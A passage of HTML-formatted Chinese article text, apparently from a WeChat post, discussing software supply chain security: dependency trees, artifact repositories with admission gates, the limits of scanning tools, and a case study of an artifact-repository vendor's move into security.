Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>在依赖关系树中集成安全漏洞检测机制，以便及时发现和标记问题组件。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">8. 建立通知系统：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>基于依赖关系树，建立一个能够精确定位受影响用户的通知系统。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">9. 版本控制：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>实现版本控制机制，确保问题组件不会在未经修复的情况下流转到下一个阶段。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">10. 数据分析：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">    </span>-<span style="mso-spacerun:yes;"> </span>利用依赖关系树的数据进行分析，帮助优化软件供应链管理。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">构建这样的依赖关系树需要专业的工具和系统支持，可能涉及到复杂的软件工程实践。企业可能需要开发专门的工具或使用现有的供应链管理解决方案来实现这一目标。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">技术：从传统被动扫描到制品主动管理</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. &#34;你不拥有它，你就没法保证它的安全&#34; 【</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">数据要素</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">】</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. &#34;你给我什么东西我就扫，那反过来说你没有给我的东西我就不扫&#34; 【</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">传统限制</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">】</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">核心观点概述：</span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 传统安全工具的局限性在于不管理制品，可能忽视隐藏风险。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 建议从存量制品管理开始建立安全基线，首先控制源头。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 建立公共仓库，设置准入门槛：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>存量包可直接放入</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>新增包需要审批和扫描</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 实施自动扫描门禁和人工审批机制：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>通过扫描的包可自动进入</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>未通过扫描但需要使用的包需人工申请和安全评估</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 建立基准仓库的准入机制后，可更好地管理版本溯源和漏洞更新。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 这种方法类似徽派建筑的码头墙，通过分层过滤和基线建设，将风险控制在小范围内，减少对整体业务运转的影响。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">3. </span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">软件供应链安全厂商的发展策略与市场趋势</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;好的的解决方案实际上不仅是制品库，而是一个从开源包组件隔离到安全可信发布的完整平台。&#34;</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">安全扫描工具不是软件供应链工具</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"><span style="color: rgb(39, 98, 150);font-family: &#34;微软雅黑 Light&#34;;font-size: 18.6667px;font-weight: 700;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;">从制品库到全方位软件供应链安全平台</span></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 软件供应链管理的</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FF0000;mso-font-kerning:0.0pt;">基础是制品库和远程仓库控制，用于统一管理所有依赖库</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">。【google还包括源码库】</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 目前市场上很少有定位为</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FF0000;mso-font-kerning:0.0pt;">软件供应链平台</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">的公司。</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 传统安全扫描工具（如qqiiaaxx、Black Duck等）不具备</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FF0000;mso-font-kerning:0.0pt;">软件版本管理</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">能力，因此无法实现完整的软件供应链管理。</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 要实现软件供应链管理，首先需要具备软件管理能力，而制品库是这一能力的基础。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 统一管理软件供应链的能力，这是其区别于其他安全厂商的关键特点。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span><img class="rich_pages wxw-img" data-imgfileid="100000410" data-ratio="0.5778894472361809" width="530.0700073242188" data-type="png" data-w="796" height="306.07000732421875" style="font-family: 等线;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;" src="https://wechat2rss.xlab.app/img-proxy/?k=5f0ebba1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINytGR2wdgOdIHAj7kJeyAS3Q4jUCibKdHmB1I9F6dKo9Kvj9AAyqXeGjWiakR6AY9nq7XquOicDVPibrA%2F640%3Fwx_fmt%3Dpng"/></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="color: rgb(39, 98, 150);font-family: &#34;微软雅黑 Light&#34;;font-size: 14pt;font-weight: bold;text-indent: 0pt;letter-spacing: 0.034em;">从包管理起家到软件供应链安全的领军者</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">杰蛙案例分析：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 制品库的核心技术优势在于二进制包管理，特别是供应链的包管理。</span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 制品库起家，通过收购一家专门从事安全分析的公司，扩展了其在软件供应链安全方面的能力。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: 